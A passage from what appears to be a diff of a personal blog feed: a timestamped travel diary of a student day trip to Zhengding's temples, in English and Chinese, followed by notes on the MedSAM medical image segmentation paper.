    12:46 - Guanghui Temple

    png

    First stop: Guanghui Temple

    First stop, Guanghui Temple.

    The Guanghui Temple Hua Pagoda is an octagonal, brick-carved, timber-mimicking pavilion-style "flower pagoda" of four storeys, a main pagoda with attached minor pagodas, all in brick, sharing one square platform, octagonal in overall plan. It stands 40.5 m, uniquely shaped and structurally varied. Above the third storey, the eight faces and corners carry moulded dragons, tigers, leopards, lions, elephants, Buddha figures, and so on, so the shaft resembles a bouquet, hence "Hua (flower) Pagoda".

    Many sights in the old town are half price at the moment; a half-price ticket is ¥7.50.

    13:15 - Linji Temple

    png

    Linji Temple, free of charge

    No ticket for Linji Temple? Thumbs up! ¥0.00. The tallest pagoda is the Chengling Pagoda of Linji Temple; beside it stand a Mahavira hall, a sutra repository, and the like.

    Linji Temple was founded in 540, the second year of the Xinghe era of the Eastern Wei. The Zhengding county annals record: "Linji Temple, built in the second year of Xinghe of the Eastern Wei, in Linji village some two li southeast of the city", the name presumably taken from its position by a ferry crossing on the Hutuo. A memorial stele for the old Linji cloister site now stands there.

    13:44 - Yanghe Tower

    png

    Yanghe Tower, for climbing and gazing afar

    In front of the Yanghe Tower is a Guandi temple; we paid our respects. Guan Yu sits in the middle; of the four flanking figures I could only name Zhou Cang, the one with the blade 😅. I also managed to take photos right next to the no-photography sign without noticing.

    The Yanghe Tower stands halfway between the centre of Zhengding and the south gate, straddling South Street inside the gate. First built between the late Jin and early Yuan, it was repaired under the Yuan, Ming, and Qing. Seven bays wide, it sits on a high, open brick platform pierced by two arched tunnels, left and right, for people and carts, a layout faintly like the Duanmen at Beijing's Tian'anmen, except that a Guandi temple leans against the platform at the south centre. Painfully for us today, the tower was demolished in the 1960s.

    Up the Yanghe Tower for ¥3.00, with a fine view over the old city.

    13:54 - Zhengding historical culture street

    jpg

    Brother Fan shops and shops; I don't

    The street's signboards reminded me of Beijing's Liulichang, all bright colours. Inside, it's much like Fuzhou's Nanhou Street: everyone selling something.

    13:56 - Liang clan ancestral shrine

    jpg

    The modest Liang clan shrine

    The shrine's construction is probably linked to Liang Menglong and his father Liang Xiang; the gate and a hall built in the late Ming survive. The hall faces west, five bays wide and seven purlins deep, with a single-eave flush-gable roof. It once held the tablets of the Liang ancestors and now serves other uses. As a survivor of the many buildings the Liang family raised, it matters both for studying the family and for adding another building type and layer of cultural meaning to the record of Zhengding's architecture.

    To the right of the culture street sits the Liang clan shrine. Normally ¥10.00, currently free, ¥0.00. Not knowing the family's history, though, I couldn't read much out of it 😅.

    14:26 - Xi'an mipi

    png

    The slightly poor-value Xi'an mipi shop

    Lunch was a scattershot affair at a Xi'an mipi place on the left of the culture street. Brother Fan had a bowl of hot mipi, ¥11.00; I had a vegetarian jiamo, ¥4.00. He said the hot mipi wasn't good, and I thought the jiamo was awfully austere 😅: effectively a braised egg, ¥1.50, in a flatbread, ¥2.50. For a tourist area, though, the prices are fine: dearer than Baoding, cheaper than Fuzhou 🤔.

    14:41 - Kaiyuan Temple

    png

    Kaiyuan Temple, where someone even cut the ticket queue on us

    After eating, we reached the Kaiyuan Temple on the left of the culture street. Full price ¥20.00, today's special ¥10.00. Features one large crocodile-like stone beast and several stone lions 🤨.

    Kaiyuan Temple was founded under the Eastern Wei and renamed "Kaiyuan", following the general fashion, in the Kaiyuan era of the Tang. Only the bell tower and the Xumi Pagoda survive intact. Not much is left, but the bell tower is no small matter: when the Society for the Study of Chinese Architecture surveyed Zhengding in the 1930s, Liang Sicheng called it an unexpected delight and judged it possibly Tang timberwork: "The bell tower, three bays square: its upper storey exterior is a later repair, but the interior and the massive bracket sets of the lower storey, if you told me they were Tang construction, I could not deny it." Strictly speaking, this was likely the first Tang-era timber building Liang Sicheng ever saw.

    15:01 - Some hutong

    jpg

    A Shijiazhuang courtyard house?

    Wandered into a hutong whose name I never learned; a bit like a Beijing siheyuan?

    15:05 - Some slogan

    jpg

    The slogan

    The banner beside the Changshan Theatre in Zhengding:

    "Thoroughly study, publicise, and implement the spirit of the 20th Party Congress; emancipate the mind and forge ahead; accelerate the building of a strong economic province and a beautiful Hebei; contribute to building a modern socialist country in all respects and advancing the great rejuvenation of the Chinese nation."

    15:08 - Tang dynasty stele

    jpg

    A stele on a turtle's back

    Checked in with a photo at the Tang stele and moved on, heartless photo machine that I am 🤐. A stone turtle carries the whole stele on its back.

    15:17 - Tianning Temple

    png

    The Lingxiao Pagoda of Tianning Temple, where seven laps bring world harmony

    Tianning Temple, formerly Dazang Cloister, was built in the Dazhongxiangfu era of the Northern Song (1008-1016) and granted the name "Chengtian Temple"; it took the name Tianning in the Zhenghe era (1111-1118). In 1138, Emperor Gaozong of Song renamed it in honour of his father Huizong, first "Bao'en Guang Temple", later amended to "Bao'en Guang Temple" with a different final character. Only the main hall survives; in 1988 the State Council listed it as a national key protected cultural site. The hall is one of the typical surviving Yuan-dynasty timber buildings of southern China, three bays square with a single-eave hip-and-gable roof, and carries a double-outline ink inscription under the eastern purlins of the central bay recording a rebuild in the fifth year of the Yuan Yanyou era (1318).

    Tianning Temple: full ticket ¥15.00, today's special ¥7.50. It also hosts a fieldwork base of Renmin University's School of History 🤔. The centrepiece is the Lingxiao Pagoda. A sign in front says circling it seven times brings Great Harmony to the world; I did one token lap. Brother Fan actually completed all seven! I said I'd settle for a Russia-Ukraine ceasefire rather than world harmony; Fan declared world harmony simply means America explodes 🤪.

    15:40 - Hospital 256

    jpg

    A hospital with character

    Spotted another promising pagoda; the map said it was the No. 256 Hospital 😅, complete with a whiff of disinfectant. Even the hospitals here are built in antique style!

    15:50 - Wangquan South Street

    jpg

    An influencer alley

    Before tackling Longxing Temple, the biggest of the lot, we decided to eat something first. Wangquan South Street feels even more like Nanhou Street. I wanted a bowl of authentic Anhui beef "ber" noodles; there were none. Tsk. The eight great bowls are plainly more than two people can finish, so that was out. Everything else was influencer snack food: skewers, stinky tofu, ice cream, and the like 🤔.

    16:13 - Shaomai

    jpg

    Tasty meat shaomai

    In the end we got a tray of shaomai at the snack shop opposite Longxing Temple: 10 for ¥20.00. Beef inside, I think? I found them fragrant; Brother Fan found the meat a bit gamy and couldn't take it 🤔.

    16:21 - Longxing Temple

    png

    Longxing Temple, the biggest of them all

    And then the old boss of the ancient city: Longxing Temple! It really is sizeable. No half-price deal for ordinary visitors, ¥50.00, but we have student cards, yay! ¥25.00.

    Longxing Temple, also called the Great Buddha Temple, stands on Dongmenli Street in Zhengding County, Shijiazhuang, Hebei. Founded in 586 (the sixth year of the Sui Kaihuang era) as Longcang Temple and renamed Longxing Temple under the Tang, it received its current name plaque from the Kangxi emperor in 1710. It is among the earliest, largest, and most completely preserved Buddhist monasteries in China.
    The grounds cover 82,500 m², with a dozen halls large and small arrayed along and beside a north-south axis, rising and falling with a clear hierarchy, an important physical example of Song-era monastery layout.
    It is rated a AAAA scenic area, among the first batch of national key protected cultural sites, and one of China's ten great temples.

    • Per our taxi driver, there's a 22-metre Thousand-Armed Guanyin, mightily imposing up close
    • Some Buddhist murals
    • A few halls faintly reminiscent of the Forbidden City
    • An artificial hill a little like Beijing's Jingshan, for viewing the grounds from the top, though not quite tall enough 🤔
    • Some Buddhist statues I assumed had lost their heads to wind and weather; a bystander said they were smashed in the Cultural Revolution. The Revolution really did rage fiercely up north 🫣, it even knocked Baoding out of its provincial-capital seat

    17:34 - Zhao Yun Temple

    png

    "I am Zhao Zilong of Shijiazhuang!"

    The Zhao Yun Temple in Zhengding County, Shijiazhuang, formally opened to the public in 1997. Zhao Yun, courtesy name Zilong, a native of Zhending in Changshan (around today's Guchengdong Road, Shijiazhuang), was a famous Three Kingdoms general known as the "ever-victorious general".

    People love to mock "Shijiazhuang" as a bumpkin name; "Shimen" or "Changshan" would sound far grander. "I am Zhao Zilong of Shijiazhuang", hilarious. Half-price special today, ¥10.00. Plenty of statues inside, all modern: the Five Tiger Generals, Liu-Guan-Zhang-Zhao, Liu-Guan-Zhang-Zhao plus Zhuge, and so on. There's a garden of figurines wielding the eighteen classic weapons, an archery range, ¥10.00 for 20 arrows (we passed 😅), and even, allegedly, yellow earth from the battlefield of Changbanpo. How trustworthy is that, exactly?

    18:02 - Rongguo Mansion

    png

    The baffling Rongguo Mansion

    The taxi driver had warned us: Rongguo Mansion is just a newly built structure; skip it unless you know Dream of the Red Chamber. So it proved 😅. But having come all this way, compulsion won and in we went. ¥40.00, no special offer, but student half price, ¥20.00. Lots of Red Chamber set dressing inside, Lin Daiyu, Jia Baoyu, blah blah... wasted on a philistine like me who never read the novel 😅. Many girls in hanfu were taking photos inside.

    Rongguo Mansion was designed and built strictly after the Chinese classic Dream of the Red Chamber: a Ming-Qing style replica compound in two parts, mansion and street. It realises the "golden gates and jade halls of an immortals' manor, cassia chambers and orchid palaces of an imperial consort's home" described in the book, covering 22,000 m².

    18:36 - Ber noodles

    jpg

    No ber noodles for us; gutted

    On the way out, a ber-noodle shop, ¥10.00 a bowl; sadly sold out, only helao noodles left, so we passed.

    18:55 - Zhengding north wall

    jpg

    The wall as it originally looked

    Another stretch of walking brought us to the north wall. Now this is what the wall looked like before restoration 😅!

    19:00 - Zhengding No. 1 High School

    jpg

    Hebei Zhengding No. 1 High School

    With a 19:50 train to catch, we grabbed a car at 19:00, fare ¥16.51. Passed Zhengding No. 1 High School on the way.

    19:18 - Zhengding station

    jpg

    Heading back!

    Back at the modest Zhengding station

    jpg

    Small as a sparrow, but it works

    A bit too modest, frankly! A tiny waiting hall, toilets outside the building, and ticket gates that don't even scan your ID 🤔.

    19:47 - Off we go!

    jpg

    Night falls; your story is over

    And then the train ran 20 minutes late. Doomed!

    21:32 - Baoding station

    jpg

    Baoding station at night

    Baoding station: ride-hailing is slow at this hour, and the bathhouse closes at 22:00, hello?!

    21:54 - Hebei University

    jpg

    One final sprint, and still no bathhouse

    The net result: thanks to the 20-minute delay, we reached the dorm at 22:02. Missed it by that much. Tsk. So once again it was a DIY wash on the balcony 🤐.

    ]]>
    + 前言

    ​ 这篇博客记录了 2023.4.30,一阵正定特种兵旅游的流水账。

            

    jpg

    走死我了

    ​ 凡哥是真能走啊!凡神强,我投降😅!

    正文

    06:03-河百带学

    ​ 对本次出行的准备:

    • 07:20 - 08:32,保定到正定的火车票,¥18.50
    • 19:50 - 21:04,正定到保定的火车票,¥18.50
    • 一瓶矿泉水
    • 一个充电宝
    • 一包纸巾
    • 一个保温包
    • 一个水壶

    ​ 稍微在小红书上了解了一些但是不多,然后就,润!

    jpg

    清晨的冀大,晨曦

    ​ 因为从来没有去过保定站,事先给到车站留了很长的时间。05:30 起的床,上完厕所洗个漱,6:00 等宿管阿姨开门,准备出发。本来想在冀大食堂整两个肉夹馍吃,结果阿姨说饼还没热,好吧,我的肉夹馍😭。

    ​ 前一天晚上我 10 点多就睡了,凡哥居然凌晨 3 点才睡,一开始有点担心他,后来才知道是我多虑了😅。

    三点睡,五点起,阎王夸我好身体。

    ——凡哥

    06:16-润!

    jpg

    前往保定站

    ​ 还没出学校就喜迎第一憨。叫了个车想从小门出发,结果小门居然没开😅,怕等太长时间就提前叫了个车,结果车来的太快,一阵狂奔到南门。哇,还没开始玩就已经累了。

    ​ 北方的出租车司机似乎很爱说话,跟我们说出去玩很堵之类的,然后还说了一长串,但是河北口音我真的听不习惯啊!虽然没听懂,但也出于礼貌我就一直“好嘞好嘞”😅。

    ​ 冀大南门-保定站,¥22.00,大概半小时吧。

    06:28-保定站

    png

    挤但不算太挤

    ​ 这次坐火车,也算是以后可能要面对的自己坐动车来返学校做演练。来的还是早了些,在保定站里等了半个多小时。没吃早饭,但是想想到正定也不算太晚就决定到正定再吃。人还蛮多的,看到火车有点绷不住了,里面有点干净又卫生了😅。

    08:30-正定站

    jpg

    绿皮火车

    ​ 下了车觉得车站有点破😅,上次看到这么破的车站应该是在甘肃?

    jpg

    开冲!

    ​ 非常简朴的正定站

    正定如今是位于石家庄北部的一个小县城,但在历史上可是河北地区的重镇。正定旧名真定,南临滹沱河,西控太行山的井陉关口,是连接河北与山西、拱卫京畿的咽喉要地。正定最早设县的记录在秦朝,当时叫东垣县,汉高祖在此处平定叛乱后,为盼政权稳固,希望天下从此真正安定,改东垣县为真定县,此后一直沿用至清代。唐朝安史之乱之后,真定为成德军节度使治所所在地,成为藩镇割据的「小国都」,得到了较大的发展。正定城的形制,就是由成德军节度使李宝臣在应宝元年(762 年)重建而成的。唐宋时期,真定城内佛教兴盛,现存的不少古建筑都是当时留下的。明清时期,真定成为保卫京师的驻军重地,清初也做过河北省会(康熙年间直隶总督驻真定府),后因避世宗胤禛讳改真定府为正定府,沿用至今。20 世纪初,清廷修筑正太铁路。这条原定为正定到太原的铁路,最终因为滹沱河架桥的问题,起点改为了滹沱河南边的石家庄村,从此石家庄借铁路崛起,最后成为河北省省会,而原先风光的正定,则日渐衰落,成为如今略显萧条的小县城。

    08:44-批发市场

    png

    吃吃吃

    ​ 下了车第一件事,解决早饭!刚好火车站旁边有个批发市场,有卖早餐。这一段看了下正定城建,感觉比保定市区还要好一些🤔?

    ​ 整了点北方特色早餐:

    • 韭菜鸡蛋蒸饺,¥10.00 一屉 15 个
    • 煎饼果子,¥8.500
    • 1 * 鲜肉灌汤包 + 1 * 豆腐青椒包 + 1 * 金瓜小米粥 = 2 *¥1.50 + 1 *¥1.50 + 1 *¥3.00 =¥6.00

    ​ 不得不佩服凡哥是真的能吃😅,我留了两个包子中午吃。北方的面食确实好吃!

    09:40-滹沱河生态景区

    png

    滹(hū)沱,汉语词语,意思是守护陵墓人员的居住点😅

    滹沱河,古又作虖池或滹池,是海河水系子牙河的上游支流之一,它发源于山西省忻州市繁峙县泰戏山桥儿沟村一带,流经忻州市繁峙县、忻州市代县、忻州市原平市、忻州市忻府区、忻州市定襄县、阳泉市盂县、石家庄市平山县、石家庄灵寿县、石家庄市正定县、石家庄市藁城区、石家庄市无极县、石家庄市晋州市、石家庄市深泽县、衡水市安平县、衡水市饶阳县、衡水市武强县、沧州市献县,滹沱河在河北省沧州市献县与滏阳河交汇形成子牙河,滹沱河全长 587 公里,流域面积 2.73 万平方公里。

    ​ 打了个车到滹沱河生态景区,¥19.94。这一段路很有春天的味道!树林都是绿油油的。

    • 有划船项目,我把凡哥按住了没去划😅

    • 中间有一段火车主题的建筑,展示石家庄铁路很发达,是一个用火车拉来的城市

    • 远处还在修桥

    • 有段假沙滩,¥30.00 一次,可惜我也算是个老赶海家了不感兴趣😃

    • 有段萤火星河露营地,4 个人¥199 租一个营地,可以烧烤露营。石家庄也在努力整网红路线啊!

    • 凡哥看中对岸的揽秀塔,想要步行走过去。我看了看要走 4 多公里,快 2 个小时,就把凡哥按住了没走过去😅

    我跟阎王意见一致。

    ——关某

    10:40-会展中心

    png

    国际会展中心

    石家庄国际会展中心坐落在正定新区滹沱河北岸、新城大街西侧,附近有石家庄地铁 1 号线经过,总用地约 68.5 公顷,其中地上建筑面积 16 万平方米、地下建筑面积 3 万平方米,石家庄国际会展中心包括展览中心 10 万平方米、会议中心 6 万平方米及配套设施等;到 2008 年 5 月初为止,石家庄国际会展中心建设总工期为三年,总投资 20 亿元,项目建设所需资金,全部由石家庄市财政拨款解决,计划分三年投入。建设石家庄国际会展中心被认为是石家庄市的一件大事,是贯彻落实“每年一大步,三年大变样”要求的一项重要举措。被认为对于完善城市功能,提升城市形象,增强城市竞争力,提高城市影响力具有重要意义。

    ​ 往北走,稍微靠近点正定古城,结果来到了石家庄国际会展中心,凡哥说他从来没有看到过这么大的会展中心,不过我想说还是比福州的海峡国际会展中心略逊一筹🤔。里面还有漫展和车展,可以看到好多 coser。

    12:08-一阵堵车

    jpg

    堵堵堵,导航上一阵红

    ​ 凡哥又想步行走去正定古城!我看了看要走 4 多公里,快 2 个小时,就把凡哥按住了没走过去😅,叫了个车,¥16.14。热心的出租车司机给我们介绍了下石家庄,大致说:

    • 石家庄这个城市没什么历史底蕴,是“铁路拉来的城市”,正定和保定好些
    • 市区没啥好玩的,一般都是正定
    • 正定古城里很多建筑都只是仿古建筑而已
    • 正定古城里吃的并不贵
    • 石家庄美食有八大碗、安徽正宗牛肉板面,但是司机的口音会说成 ber 面🤪

    ​ 后来觉得司机说的还蛮对。

    ​ 坐车坐着坐着给我坐饿了,下车后就把早上买的俩包吃了。

    12:13-正定南城墙

    jpg

    这么近,那么美,周末到河北

    正定古城位于河北省会石家庄市北 15 公里处,是按照中华传统规划思想和建筑风格建设起来的城市,集中体现了公元 5 世纪至 19 世纪前后中国的历史文化特色,是古代劳动人民的聪明才智和坚强毅力的结晶。

    源远流长的历史,给古城留下了瑰玮灿烂、风格独特的文化名胜古迹,素以“三山不见,九桥不流,九楼四塔八大寺,二十四座金牌坊”而著称。
    三山不见”指的是历史上正定这块土地曾是中山国、恒山郡、常山郡的治所所在,但正定境内却没有山。
    九桥不流”说的是隆兴寺前面的一座单孔三路石桥、府文庙和县文庙大殿前面各有的一座泮桥(古代泮桥均为三桥并列的形制),但都无活水流过。
    九楼四塔八大寺”指的是原城内的四个门楼、四个角楼、还有阳和楼;四塔是凌霄塔、华塔、须弥塔、澄灵塔;八大寺指的是隆兴寺、广惠寺、临济寺、开元寺、天宁寺、洪济寺、舍利寺、崇因寺,后三寺已毁。
    二十四座金牌坊”是过去正定拥有大大小小二十四座金牌坊,例如像较大的许家牌坊、梁家牌坊、常山古郡、圣德通天、德配天地、木铎万事等。
    但是由于历史的变迁,风吹雨打,尤其是经历十年文革动乱,不少珍贵的文物被毁坏了,但从现有的国家保护文物 9 处、省级保护文物 6 处、县级保护文物 10 余处来看,正定仍不失为历史文化名城的风采。
    古城正定于 1990 年被列为省级历史文化名城,1994 年被列为国家级历史文化名城。

    历史上曾与保定北京并称为“北方三雄镇”。

    正定古城城墙门口展示着河北旅游的标语:这么近,那么美,周末到河北。听着像是给北京爷说的🤔。在停车场上确实看到了不少北京的车牌。

    png

    正定南城墙

    ​ 南城墙上面有个楼,然后你可以走楼梯上去看看风景。

    12:29-燕赵南大街

    jpg

    卖东西的燕赵南大街

    ​ 我们先去了最近的燕赵南大街,但我看里面没啥想吃的就没买,凡哥买了一串烤鱿鱼,¥16.00,一杯咖啡¥5.90。

    12:46-广惠寺

    png

    第一站:广惠寺

    ​ 第一站是广惠寺

    广惠寺华塔为八角砖雕砌仿木构楼阁式花塔,共四层,由主塔和附属小塔构成,全用砖砌,坐在同一方形基台上,总平面呈八角形。塔高 40.5 米,造型独特,结构富于变化。因塔身第三层以上八面八角的垂线有龙虎豹狮象及佛像等壁塑,形如花束,被称为华塔。

    ​ 这段时间正定古城里很多景点都是半价票,一张半价票¥7.50。

    13:15-临济寺

    png

    免费的临济寺

    临济寺不要门票?好评!¥0.00。最高的塔叫做临济寺澄灵塔。旁边有大雄宝殿,藏经楼啥的。

    临济寺始建于北朝东魏兴和二年(540 年)。《正定县志》载:“临济寺,东魏兴和二年建,在城东南二里许临济村。”概因濒临滹沱河渡口得名。今在其原址立有临济院旧址纪念碑。

    13:44-阳和楼

    png

    登高望远的阳和楼

    ​ 阳和楼前面有个关帝庙,拜一拜。中间是关公,旁边四个除了拿刀的是周仓以外,其他不知道😅。然后我还在禁止拍照的标语旁边拍照了,没注意。

    阳和楼位于河北省正定县城中心至南城门的中段,横跨正定城南门内南大街上。它始建于金末元初,元、明、清均有修葺。楼七楹、建立在高敞的砖台上,台下有圆拱洞门,左右各一,行人车马可以通行,其布局略似北京天安门端门,但南面正中还有关帝庙一所倚台建立。今人痛心的是阳和楼于二十世纪六十年代被拆毁。

    ​ 上阳和楼,¥3.00。可以登高看古城风景。

    13:54-正定历史文化街

    jpg

    凡哥买买买,我不买

    正定历史文化街的招牌让我想起了北京的琉璃厂,花花绿绿的。里面跟南后街差不多?反正都在卖东西。

    13:56-梁氏宗祠

    jpg

    小小的梁氏宗祠

    正定梁氏宗祠修建可能与梁梦龙及其父梁相有关,现存大门和建于明代晚期的祠堂。祠堂坐东朝西,面阔五间、进深七檩,采用单檐硬山顶,其中原供以梁氏先人牌位,现已改为他用。正定梁氏宗祠为梁氏家族历史上所建诸多建筑之幸存者,不仅是研究该家族的重要实物,也为正定古建筑发展序列增添了不同的建筑类别和文化内涵。

    ​ 正定历史文化街右侧有一个梁氏宗祠。正常¥10.00,现在免票¥0.00。不过我不太了解这里的历史,看不出什么东西😅。

    14:26-西安米皮

    png

    感觉有点不太划算的西安米皮店

    ​ 中午乱吃一通,去了文化街左侧一家西安米皮。凡哥要了碗热米皮,¥11.00,我要了个素夹馍,¥4.00。凡哥说热米皮不好吃,我觉得素夹馍也太简陋了点😅,相当于卤蛋¥1.50,一个馍¥2.50。其实在景区里,这价格也还好,比保定的贵比福州的便宜🤔。

    14:41-开元寺

    png

    买票还被人插队的开元寺

    ​ 吃完来到文化街左侧的开元寺。全票¥20.00,今日特惠¥10.00。有一只大鳄鱼和几只石狮子🤨。

    开元寺始建于东魏年间,唐代开元年间随大流改名为「开元寺」。开元寺现存完整建筑仅为钟楼与须弥塔一座。虽剩的不多,但这座钟楼来头可不小,上世纪 30 年代营造学社考察正定时,梁思成就称其为意外之喜,断定其可能为唐代木构遗存:「钟楼三间正方形,上层外部为后世重修,但内部及下层的雄大的斗栱,若说它是唐构,我也不能否认。」严格意义上来说,这应该是梁思成第一次见到唐代木构建筑。

    15:01-XX 胡同

    jpg

    石家庄四合院?

    ​ 进了一个不知道叫什么的胡同,有点像北京的四合院?

    15:05-XX 标语

    jpg

    标语

    ​ 正定县常山影剧院旁边的标语

    深入学习宣传贯彻党的二十大精神,解放思想、奋发进取,加快建设经济强省、美丽河北,为全面建设社会主义现代化国家、全面推进中华民族伟大复兴贡献力量。

    15:08-唐朝古碑

    jpg

    龟龟驮着的碑碑

    ​ 在唐朝古碑前面打了个卡就走了,无情的拍照机器🤐。下面有只石龟背着整个碑。

15:17 - Tianning Temple

png

Tianning Temple's Lingxiao Pagoda: seven laps for world harmony

Tianning Temple, formerly Dazang Cloister, was built in the Dazhong Xiangfu era of the Northern Song (1008-1016) and granted the name "Chengtian Temple"; it took the name Tianning Temple in the Zhenghe era (1111-1118). In the eighth year of Shaoxing under Emperor Gaozong of Song (1138 CE) it was renamed "Bao'en Guang (广) Temple" in memory of his father Huizong, later changed to "Bao'en Guang (光) Temple." Only the main hall survives; in 1988 the State Council listed it as a National Key Cultural Heritage site. The hall is one of the representative surviving Yuan-dynasty timber buildings of southern China, three bays in both width and depth, with a single-eave hip-and-gable roof; under a purlin of its central bay it carries a double-outline ink inscription recording a reconstruction in the fifth year of Yuan Yanyou (1318).

Tianning Temple: full price ¥15.00, today's special ¥7.50. It's also a fieldwork base for Renmin University's School of History🤔. The temple's main structure is the Lingxiao Pagoda. A sign in front says circling it seven times brings world harmony; I did one token lap. Fan-ge actually completed all seven! I said I wasn't asking for world harmony, a Russia-Ukraine ceasefire would do; Fan-ge declared that world harmony just means America blowing up🤪.

15:40 - No. 256 Hospital

jpg

A hospital with character

Another pagoda caught my eye, but the map said it was the No. 256 Hospital😅, and there was even a whiff of disinfectant. Even the hospitals here are built in antique style!

15:50 - Wangquan South Street

jpg

An influencer-bait street

Before tackling Longxing Temple, the biggest of them all, we decided to eat something first. Wangquan South Street felt even more like Fuzhou's Nanhou Street. I wanted a bowl of authentic Anhui beef "ber" noodles, but there weren't any, damn. The eight-bowl feast was clearly more than two people could finish, so we passed. The rest was all influencer snacks: skewers, stinky tofu, ice cream and the like🤔.

16:13 - Shaomai

jpg

Tasty meat shaomai

In the end we got a steamer of shaomai at a snack shop opposite Longxing Temple: 10 for ¥20.00. Beef filling, I think? I found them fragrant; Fan-ge said the meat smelled gamy and he couldn't take it🤔.

16:21 - Longxing Temple

png

Longxing Temple, the biggest of them all

Then came the big brother of the old city: Longxing Temple! The grounds really are large. This ticket isn't half price for the general public, ¥50.00, but we had student IDs, yay! ¥25.00.

Longxing Temple, also known as the Great Buddha Temple, stands on Dongmenli Street in Zhengding County, Shijiazhuang, Hebei. Founded in the sixth year of Kaihuang of the Sui (586 CE) as Longcang Temple, it was renamed Longxing (龙兴) Temple under the Tang; in the forty-ninth year of Kangxi (1710) it was granted the plaque "Longxing (隆兴) Temple," the name used ever since. It is one of the earliest, largest, and most completely preserved Buddhist monasteries in China.
The monastery covers 82,500 m², with a dozen or so halls laid out along a north-south axis and on either side of it, rising and falling with a clear hierarchy; it is an important surviving example of Song-dynasty monastery layout.
Longxing Temple is rated a national AAAA tourist attraction, was among the first batch of National Key Cultural Heritage sites, and counts as one of China's ten great temples.

• As the taxi driver had told us, there is a 22 m tall Thousand-Armed Guanyin, most imposing up close
• There are also some Buddhist murals
• Some halls look a little like the Forbidden City
• There's an artificial hill a bit like Beijing's Jingshan; you can look out from the top, though it isn't quite high enough🤔
• Some Buddhist statues: I assumed wind and sun had claimed their heads, but someone nearby said they were smashed during the Cultural Revolution. The Cultural Revolution really was fierce up north🫣; it even cost Baoding its seat as provincial capital

17:34 - Zhao Yun Temple

png

"I am Zhao Zilong of Shijiazhuang!"

The Zhao Yun Temple, in Zhengding County, Shijiazhuang, Hebei, formally opened to the public in 1997. Zhao Yun, courtesy name Zilong, was a native of Zhending, Changshan (around today's Gucheng East Road in Shijiazhuang), a famed general of the Three Kingdoms known as the "ever-victorious general."

People love to mock the name Shijiazhuang ("Shi family village") as hopelessly rustic; Shimen or Changshan would sound far better. "I am Zhao Zilong of Shijiazhuang", hilarious. Today's special half-price ticket: ¥10.00. Lots of statues inside, all modern: the Five Tiger Generals, Liu-Guan-Zhang-Zhao, Liu-Guan-Zhang-Zhao plus Zhuge, and so on. There's a garden of shrubs trimmed into little figures wielding the eighteen classic weapons, and an archery stand, ¥10.00 for 20 arrows; we passed😅. They even display yellow earth supposedly from the Changbanpo battlefield; how credible is that?

18:02 - Rongguo Mansion

png

Rongguo Mansion, lost on me

The taxi driver had warned us that Rongguo Mansion is just a newly built complex: don't bother unless you know Dream of the Red Chamber. He was right😅. But we'd come all this way, so compulsion won out and in we went. ¥40.00 with no discount, but half price with a student ID: ¥20.00. It's full of Red Chamber trappings, Lin Daiyu, Jia Baoyu, blah blah... sadly this philistine has never read the novel😅. Plenty of girls in hanfu were taking photos inside.

Rongguo Mansion was designed and built strictly after the classic novel Dream of the Red Chamber, a Ming-Qing style complex in two parts, the mansion and the street. It realizes the princely residence the novel describes as "a celestial manor with golden gates and jade doors, a palace of cassia and orchid halls fit for an imperial consort," covering 22,000 m².

18:36 - "Ber" noodles

jpg

No "ber" noodles for us; big loss

On the way out there was a banmian shop, ¥10.00 a bowl, but it was sold out; only hele noodles were left, so we skipped it.

18:55 - Zhengding North City Wall

jpg

The wall's original face

Another stretch of walking brought us to the north city wall. Now this is what the wall looked like before restoration😅!

19:00 - Zhengding No. 1 High School

jpg

Hebei Zhengding No. 1 High School

We had a 19:50 train to catch, so at 19:00 we grabbed a taxi and bailed, ¥16.51. Zhengding No. 1 High School, seen along the way.

19:18 - Zhengding Railway Station

jpg

Homeward!

Back at the humble Zhengding Station.

jpg

Tiny, but it does the job

A little too humble, though! A tiny waiting room, toilets you have to go outside for, and turnstiles that don't even scan your ID🤔.

19:47 - Off we go!

jpg

Night falls; your story ends here

And then the train was 20 minutes late. Great!

21:32 - Baoding Station

jpg

Baoding Station at night

At Baoding Station at this hour, even ride-hailing is slow, and the bathhouse closes at 22:00!

21:54 - "Hebei Univercity"

jpg

A final sprint, and still no bathhouse

The upshot: thanks to the 20-minute delay we reached the dorm at 22:02, missing the bathhouse by a hair, damn. So once again I DIY'd it on the balcony🤐.

    ]]>
    @@ -7024,7 +7024,7 @@ /posts/Diary-%E5%A5%BD%E5%A5%BD%E5%AD%A6%E4%B9%A0%E5%A5%BD%E5%A5%BD%E7%8E%A9%E7%9A%84%E7%AC%AC%209%20%E5%91%A8%E5%92%8C%E7%AC%AC%2010%20%E5%91%A8/ -
    ]]>
    +
    ]]>
@@ -7078,7 +7078,7 @@ /posts/Paper-Segment%20Anything%20in%20Medical%20Images/ - Resources

Notes

• SAM is seriously impressive! But its performance on medical images is quite limited.

• The paper introduces MedSAM

  • It curates a large-scale medical image dataset covering 11 imaging modalities with more than 200,000 masks, and provides a step-by-step tutorial on fine-tuning SAM on a customized new dataset

  • It develops a simple fine-tuning method to adapt SAM to general medical image segmentation; on 21 3D segmentation tasks and 9 2D tasks it works better than the default SAM.


The first and best-known **segmentation foundation model** is SAM, trained on more than 1B masks; it can generate accurate object masks from prompts (e.g., bounding boxes, points, text) or in a fully automatic way. But there are significant differences between natural and medical images, so the applicability of such models to medical image segmentation remains limited, and they do poorly on typical medical segmentation tasks where object boundary cues are weak.


SAM uses a transformer-based architecture:

• A transformer-based **image encoder** extracts image features

  • Pretrained with masked auto-encoder modeling, it handles high-resolution inputs (i.e., $1024\times 1024$), and the resulting image embedding is $16\times$ downscaled ($64\times 64$)
• A **prompt encoder** incorporates user interaction

  • Four prompt types are supported
    • Points: encoded with Fourier positional encoding plus two learnable tokens that distinguish foreground from background
    • Bounding boxes: encoded by their top-left and bottom-right corner points
    • Text: encoded by the pretrained text encoder from CLIP
    • Masks: same resolution as the input image, encoded by convolutional feature maps
• A **mask decoder** generates segmentation results and confidence scores from the image embedding, prompt embeddings, and output tokens.

  • It uses a lightweight design: two transformer layers with a dynamic mask prediction head and an IoU (Intersection-over-Union) score regression head.

The mask prediction head can produce three $4\times$-downscaled masks, corresponding to the whole object, a part, and a subpart.

    png


SAM supports three main segmentation modes:

• Segment everything in a fully automatic way
  • No semantic labels; some of the resulting segments are meaningless
• Bounding box mode
  • Given only the top-left and bottom-right points, it can already produce a good segmentation of, say, the right kidney
• Point mode
  • Give a foreground point first, then a background point

The authors argue that when applying SAM to medical image segmentation, the bounding-box mode has broader practical value than the segment-everything and point modes.
